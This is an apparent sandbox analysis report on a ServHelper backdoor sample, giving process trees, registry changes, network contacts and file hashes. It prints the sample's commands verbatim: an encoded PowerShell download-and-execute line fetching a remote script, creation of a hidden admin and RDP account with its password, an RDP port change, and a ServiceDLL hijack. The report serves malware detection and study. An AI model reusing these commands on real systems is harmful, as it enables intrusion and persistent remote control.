Malware Analysis Report

2024-10-19 04:37

Sample ID 210924-1kw5xaaabj
Target 83d119a963e7050995f9bf6be8841b95
SHA256 d7ef71aa67e1fb5a364c97ff4b89f5f6a28db1c84f91563547a4e44581833486
Tags
servhelper backdoor discovery exploit persistence trojan upx
score
10/10

Analysis Overview

Threat Level: Known bad

The file 83d119a963e7050995f9bf6be8841b95 was found to be: Known bad.

Malicious Activity Summary

ServHelper

Grants admin privileges

Possible privilege escalation attempt

UPX packed file

Blocklisted process makes network request

Modifies RDP port number used by Windows

Sets DLL path for service in the registry

Loads dropped DLL

Modifies file permissions

Drops file in System32 directory

Drops file in Program Files directory

Drops file in Windows directory

Modifies registry key

Script User-Agent

Suspicious behavior: LoadsDriver

Suspicious behavior: EnumeratesProcesses

Runs net.exe

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Analysis: static1

Detonation Overview

Reported

2021-09-24 21:43

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-09-24 21:43

Reported

2021-09-24 21:45

Platform

win7-en-20210920

Max time kernel

128s

Max time network

30s

Command Line

"C:\Users\Admin\AppData\Local\Temp\83d119a963e7050995f9bf6be8841b95.exe"

Signatures

ServHelper

trojan backdoor servhelper

Grants admin privileges

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies RDP port number used by Windows

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Sets DLL path for service in the registry

persistence

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\rfxvmt.dll C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\Basebrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\ShellBrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\49VXKDUQCCZZW4FQX540.temp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\Wbem\WMIC.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\Wbem\WMIC.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = d05927418db1d701 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Runs net.exe

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1432 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\83d119a963e7050995f9bf6be8841b95.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1432 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\83d119a963e7050995f9bf6be8841b95.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1432 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\83d119a963e7050995f9bf6be8841b95.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1928 wrote to memory of 1592 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1928 wrote to memory of 1592 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1928 wrote to memory of 1592 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1592 wrote to memory of 608 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1592 wrote to memory of 608 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1592 wrote to memory of 608 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1928 wrote to memory of 908 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1928 wrote to memory of 908 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1928 wrote to memory of 908 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1928 wrote to memory of 676 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1928 wrote to memory of 676 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1928 wrote to memory of 676 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1928 wrote to memory of 1780 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1928 wrote to memory of 1780 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1928 wrote to memory of 1780 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1928 wrote to memory of 984 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 1928 wrote to memory of 984 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 1928 wrote to memory of 984 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 1928 wrote to memory of 1612 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1928 wrote to memory of 1612 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1928 wrote to memory of 1612 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1928 wrote to memory of 1820 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1928 wrote to memory of 1820 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1928 wrote to memory of 1820 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1928 wrote to memory of 968 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1928 wrote to memory of 968 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1928 wrote to memory of 968 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1928 wrote to memory of 1880 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1928 wrote to memory of 1880 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1928 wrote to memory of 1880 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1928 wrote to memory of 1812 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1928 wrote to memory of 1812 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1928 wrote to memory of 1812 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1928 wrote to memory of 1800 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1928 wrote to memory of 1800 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1928 wrote to memory of 1800 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1928 wrote to memory of 1420 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1928 wrote to memory of 1420 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1928 wrote to memory of 1420 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1928 wrote to memory of 1292 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1928 wrote to memory of 1292 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1928 wrote to memory of 1292 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1928 wrote to memory of 1660 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1928 wrote to memory of 1660 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1928 wrote to memory of 1660 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1928 wrote to memory of 1004 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1928 wrote to memory of 1004 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1928 wrote to memory of 1004 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1928 wrote to memory of 2008 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 1928 wrote to memory of 2008 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 1928 wrote to memory of 2008 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 2008 wrote to memory of 1480 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2008 wrote to memory of 1480 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2008 wrote to memory of 1480 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1928 wrote to memory of 1444 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1928 wrote to memory of 1444 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1928 wrote to memory of 1444 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1444 wrote to memory of 1576 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1444 wrote to memory of 1576 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1444 wrote to memory of 1576 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1576 wrote to memory of 1764 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe

Processes

C:\Users\Admin\AppData\Local\Temp\83d119a963e7050995f9bf6be8841b95.exe

"C:\Users\Admin\AppData\Local\Temp\83d119a963e7050995f9bf6be8841b95.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pm_nohl0.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB8B4.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCB8B3.tmp"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile

C:\Windows\system32\takeown.exe

"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\system32\net.exe

"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\system32\cmd.exe

cmd /c net start rdpdr

C:\Windows\system32\net.exe

net start rdpdr

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start rdpdr

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\system32\cmd.exe

cmd /c net start TermService

C:\Windows\system32\net.exe

net start TermService

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc 000000 /del

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc RLGy6HnU /add

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc RLGy6HnU /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc RLGy6HnU /add

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" JZCKHXIN$ /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" JZCKHXIN$ /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" JZCKHXIN$ /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc RLGy6HnU

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc RLGy6HnU

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc RLGy6HnU

C:\Windows\System32\cmd.exe

cmd.exe /C wmic path win32_VideoController get name

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\System32\cmd.exe

cmd.exe /C wmic CPU get NAME

C:\Windows\System32\Wbem\WMIC.exe

wmic CPU get NAME

C:\Windows\System32\cmd.exe

cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

Network

Country Destination Domain Proto
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 asfggagsa3.xyz udp

Files

C:\Users\Admin\AppData\Local\Temp\ready.ps1

MD5 28d9755addec05c0b24cca50dfe3a92b
SHA1 7d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256 abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512 891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

\??\c:\Users\Admin\AppData\Local\Temp\pm_nohl0.cmdline

MD5 a3432e839a8f933a422cb56167011d84
SHA1 b303f42b8b44f58286bc6b8f80e7d4968eeffbe3
SHA256 f5f77e75d66d1cef9cf580a0f4ba2396c0cb8888971b5d949ed77a94955351bd
SHA512 3a1181f6c15af22cfa7b0d181ff2b85b899a0ef837090f83eca7f2da4e7fb6dc544c9636df5b0079fe5cdba87498c1ae856f3177ec91d0b979d6a2e05cb27d36

\??\c:\Users\Admin\AppData\Local\Temp\pm_nohl0.0.cs

MD5 9f8ab7eb0ab21443a2fe06dab341510e
SHA1 2b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256 e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA512 53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

\??\c:\Users\Admin\AppData\Local\Temp\CSCB8B3.tmp

MD5 75309916e18fb3cd86d3609939627e3a
SHA1 bc513c7ef162afbdb72e7524226d7b577971ff87
SHA256 26722b9dfa4930a4f05553a79c4b012f4aed90f4feedb8b12bcf3097753e6dc4
SHA512 109a7a5087a0a2ba43049980870cd229a1b7ed45d430bd87eba0fbdeef18c03421d2d1f7dcb48bb97d568f8496267fce0eaf1a99221056f1d002d387ba7748f3

C:\Users\Admin\AppData\Local\Temp\RESB8B4.tmp

MD5 6f02a8cad7472130729e6d4e094cdc53
SHA1 a241e4750ba47d192ef75787408979766974ae23
SHA256 7bc1d0bb89accd9dba9fc36042ffd7c2a0d23d80b37bf5da38e969e376d55d6d
SHA512 902d03baa4a3f9d6cecdf5ad02555a58a3bdbd3eae6b147d7e563851ea52188ff7bc5bc7f1883c6e18ff79ab0c2eaa995b659ab9f546af69cebb65e109f07e29

C:\Users\Admin\AppData\Local\Temp\pm_nohl0.dll

MD5 d83562f098cd389d1c57e3c70d36c6c9
SHA1 fc5b0f9ba4c94f2ab6f7e152c25c2eaad7201a65
SHA256 54bbb087b5d0e512ee0e44dd86687cdf4091ad8a10611510cbc6b5453e735e14
SHA512 60372bd5400eebb49c9525263b3b687e7747965248525db6976dd65d9fdd0d92190e7e0ad7ac06810ca0683be1993ace20f67f8b05695fb3877d1c0a220ad1a5

C:\Users\Admin\AppData\Local\Temp\pm_nohl0.pdb

MD5 d12b2ebe441a21e4667dc88a52a3e95c
SHA1 eb9434b9316d92f27636ecf3fb678e0914a07f52
SHA256 00810f4bf2e90efdf35e1818dcc0bd4dc2e29cdba95700414dbb08b71e655e16
SHA512 008921de3c674c65b639fe8cc3de8be16f9ee7fd1d7c5f9eec71bf402118968350cda6173f25370069c0f32b91772c51d33284f47cf1509633e070d193c09fc0

C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1

MD5 9d21abc1a799ae0ea31258d563532295
SHA1 a9cde90ba328e30a3eb7a5c410b304a4ae09cdba
SHA256 8075e676d039b5791405f3ab00787a16199920dfe025ff04359b953565bf6f2f
SHA512 b9324c8b4af372a89aaa8c864dab88e74fdd820b28b6fe03897151e23de01b0a0857959e0e023340e4dd18ba0a6dad2faaf365580769b3a473070457b72b3065

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 e2967258866267f5cd57ee6467242892
SHA1 9883cb588b447a714b0959191dca85b6a1584b5c
SHA256 fe0608643e423e1b9e375b8910848e999c48aaae2ec44e90f07f8e06f09be74a
SHA512 019630a91cf729ff337cbaec81680a9905bd32ef624981c647e5b2dc7ee04aa91bf64aca027a679e9e2af75ecd44671b7503e785bc0feae9895b9cfef2b0f991

C:\Windows\system32\rfxvmt.dll

MD5 dc39d23e4c0e681fad7a3e1342a2843c
SHA1 58fd7d50c2dca464a128f5e0435d6f0515e62073
SHA256 6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA512 5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

\Windows\Branding\mediasrv.png

MD5 2997902dba8aefe9e872b14c2bfb584b
SHA1 cca608ebdde64a12dca56b2bd4864089857eba01
SHA256 537ab9c5f678410f21c063f11f4a894cc15025a5590199716a01bbf365dc0e50
SHA512 4fc959cbf5bebfcb5a32fdebd2ceec8943f9d3d0ffcaed236b2d73b680c5c5f6c85d5ad3d192d7d565f4b2fe07fb87321a8036a304147df2b7f45936ff5f9fc1

\Windows\Branding\mediasvc.png

MD5 9119f61ba0d487585a8fd5aaa4198a9a
SHA1 1ff2e337e5d1547d9e1824062500f743aae999db
SHA256 6a3da788a78fc2024fbfb135624047a7d15edcae3798a3cb0e87fbab740d70f1
SHA512 322e3e0006a3015c0495b76bdf9125285e6a6dd2f84d69996e4d95cbc73449269b7945ccccad465d417394075bc69f46f91ad1eb95f717958977cb88139267ab

Analysis: behavioral2

Detonation Overview

Submitted

2021-09-24 21:43

Reported

2021-09-24 21:45

Platform

win10v20210408

Max time kernel

150s

Max time network

99s

Command Line

"C:\Users\Admin\AppData\Local\Temp\83d119a963e7050995f9bf6be8841b95.exe"

Signatures

Grants admin privileges

Modifies RDP port number used by Windows

Sets DLL path for service in the registry

persistence

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

